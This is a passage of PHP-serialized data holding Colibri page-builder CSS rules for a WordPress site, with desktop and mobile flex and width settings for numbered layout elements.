auto;\n  width: auto;\n  max-width: 100%;\n}\n\";s:6:\"mobile\";s:73:\"#colibri .style-local-22-h4-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n}\n\";}s:11:\"local-22-h6\";a:1:{s:7:\"desktop\";s:92:\"#colibri .style-local-22-h6-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n  max-width: 100%;\n}\n\";}s:11:\"local-22-h7\";a:1:{s:7:\"desktop\";s:112:\"#colibri .style-local-22-h7-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n\";}s:12:\"local-22-h13\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-22-h13-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n  max-width: 100%;\n}\n\";s:6:\"mobile\";s:95:\"#colibri .style-local-22-h13-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-22-h16\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-22-h16-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n  max-width: 100%;\n}\n\";s:6:\"mobile\";s:95:\"#colibri .style-local-22-h16-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:25;a:6:{s:11:\"local-25-h4\";a:2:{s:7:\"desktop\";s:299:\"#colibri .style-local-25-h4-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-25-h4-outer,#colibri .h-navigation_sticky.style-local-25-h4-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n\";s:6:\"mobile\";s:221:\"#colibri .style-local-25-h4-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n}\n#colibri .h-navigation_sticky .style-local-25-h4-outer,#colibri .h-navigation_sticky.style-local-25-h4-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n}\n\";}s:11:\"local-25-h6\";a:1:{s:7:\"desktop\";s:92:\"#colibri .style-local-25-h6-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n  max-width: 100%;\n}\n\";}s:11:\"local-25-h8\";a:1:{s:7:\"desktop\";s:299:\"#colibri .style-local-25-h8-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-25-h8-outer,#colibri .h-navigation_sticky.style-local-25-h8-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n\";}s:12:\"local-25-h14\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-25-h14-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-25-h17\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-25-h17-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-25-h26\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-25-h26-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-25-h26-outer {\n  width: 100% ;\n}\n\";}}i:28;a:1:{s:11:\"local-28-f4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-28-f4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:31;a:10:{s:11:\"local-31-m4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-31-m4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"dynamic-31-m5\";a:1:{s:7:\"desktop\";s:59:\".site .style-dynamic-31-m5-height {\n  min-height: 300px;\n}\n\";}s:11:\"local-31-m7\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m7-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m11\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m13\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m18\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m21\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m21-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m23\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m23-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m31\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-31-m31-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:34;a:8:{s:11:\"local-34-m4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-34-m4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"dynamic-34-m5\";a:1:{s:7:\"desktop\";s:59:\".site .style-dynamic-34-m5-height {\n  min-height: 300px;\n}\n\";}s:11:\"local-34-m7\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m7-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m13\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m13-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m15\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m15-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m19\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-34-m21\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-34-m23\";a:1:{s:7:\"desktop\";s:0:\"\";}}i:37;a:1:{s:11:\"local-37-m3\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-37-m3-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:40;a:7:{s:11:\"local-40-m3\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-40-m3-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:11:\"local-40-m5\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-40-m5-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-40-m13\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m14\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m18\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m21\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-40-m21-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:43;a:1:{s:11:\"local-43-s4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-43-s4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:46;a:1:{s:11:\"local-46-s4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-46-s4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:20;a:6:{s:12:\"local-20-c10\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-20-c10-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-20-c14\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-20-c14-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-20-c18\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-20-c18-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:11:\"local-20-c7\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-20-c7-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:54:\"#colibri .style-local-20-c7-outer {\n  width: 100% ;\n}\n\";}s:11:\"local-20-c4\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-20-c4-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:54:\"#colibri .style-local-20-c4-outer {\n  width: 100% ;\n}\n\";}s:11:\"local-20-c5\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-20-c5-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:54:\"#colibri .style-local-20-c5-outer {\n  width: 100% ;\n}\n\";}}i:122;a:4:{s:12:\"local-122-c4\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-122-c4-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-122-c4-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-122-c8\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-122-c8-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:54:\"#colibri .style-local-122-c8-outer {\n  width: 90% ;\n}\n\";}s:13:\"local-122-c18\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-122-c18-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-122-c18-outer {\n  width: 90% ;\n}\n\";}s:13:\"local-122-c19\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-122-c19-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-122-c19-outer {\n  width: 100% ;\n}\n\";}}i:126;a:12:{s:13:\"local-126-c10\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c10-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c10-outer {\n  width: 90% ;\n}\n\";}s:13:\"local-126-c11\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c11-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c11-outer {\n  width: 100% ;\n}\n\";}s:13:\"local-126-c16\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c16-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c16-outer {\n  width: 100% ;\n}\n\";}s:13:\"local-126-c19\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c19-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c19-outer {\n  width: 90% ;\n}\n\";}s:13:\"local-126-c28\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c28-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c28-outer {\n  width: 100% ;\n}\n\";}s:13:\"local-126-c31\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c31-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c31-outer {\n  width: 90% ;\n}\n\";}s:13:\"local-126-c34\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c34-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c34-outer {\n  width: 90% ;\n}\n\";}s:13:\"local-126-c35\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c35-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c35-outer {\n  width: 100% ;\n}\n\";}s:13:\"local-126-c40\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c40-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c40-outer {\n  width: 90% ;\n}\n\";}s:13:\"local-126-c41\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c41-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c41-outer {\n  width: 100% ;\n}\n\";}s:13:\"local-126-c47\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c47-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c47-outer {\n  width: 100% ;\n}\n\";}s:13:\"local-126-c51\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c51-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c51-outer {\n  width: 90% ;\n}\n\";}}i:449;a:1:{s:12:\"local-449-c4\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-449-c4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:185;a:2:{s:12:\"local-185-c4\";a:2:{s:7:\"desktop\";s:97:\"#colibri .style-local-185-c4-outer {\n  width: 33.33% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-185-c4-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-185-c7\";a:2:{s:7:\"desktop\";s:97:\"#colibri .style-local-185-c7-outer {\n  width: 33.33% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-185-c7-outer {\n  width: 100% ;\n}\n\";}}i:182;a:82:{s:14:\"local-182-c151\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c151-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c152\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c157\";a:2:{s:7:\"desktop\";s:96:\"#colibri .style-local-182-c157-outer {\n  width: 80% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:57:\"#colibri .style-local-182-c157-outer {\n  width: 100% ;\n}\n\";}s:13:\"local-182-c75\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c75-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c81\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c81-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c87\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c87-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c93\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c93-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c99\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c99-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c105\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c105-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c110\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c110-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c116\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c116-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c122\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c122-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c128\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c128-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c134\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c134-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c140\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c140-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c228\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c228-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c234\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c234-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c82\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c76\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c94\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c100\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c106\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c111\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c117\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c123\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c129\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c135\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c141\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c229\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c235\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c88\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c147\";a:2:{s:7:\"desktop\";s:96:\"#colibri .style-local-182-c147-outer {\n  width: 80% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:57:\"#colibri .style-local-182-c147-outer {\n  width: 100% ;\n}\n\";}s:14:\"local-182-c161\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c161-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c166\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c166-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c171\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c171-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c176\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c176-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c181\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c181-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c186\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c186-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c191\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c191-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c196\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c196-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c200\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c200-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c205\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c205-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c210\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c210-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c215\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c215-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c220\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c220-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c162\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c182\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c187\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c192\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c197\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c201\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c206\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c211\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c216\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c221\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c167\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c172\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c177\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c226\";a:2:{s:7:\"desktop\";s:96:\"#colibri .style-local-182-c226-outer {\n  width: 80% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:57:\"#colibri .style-local-182-c226-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-182-c4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-182-c4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c10\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c10-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c16\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c16-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c22\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c22-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c28\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c28-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c34\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c34-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c40\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c40-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c46\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c46-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c52\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c52-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c58\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c58-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c64\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c64-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-182-c5\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c29\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c35\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c41\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c47\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c53\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c59\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c65\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c11\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c17\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c23\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c71\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-182-c71-outer {\n  width: 80% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-182-c71-outer {\n  width: 100% ;\n}\n\";}}i:608;a:1:{s:12:\"local-608-c4\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-608-c4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 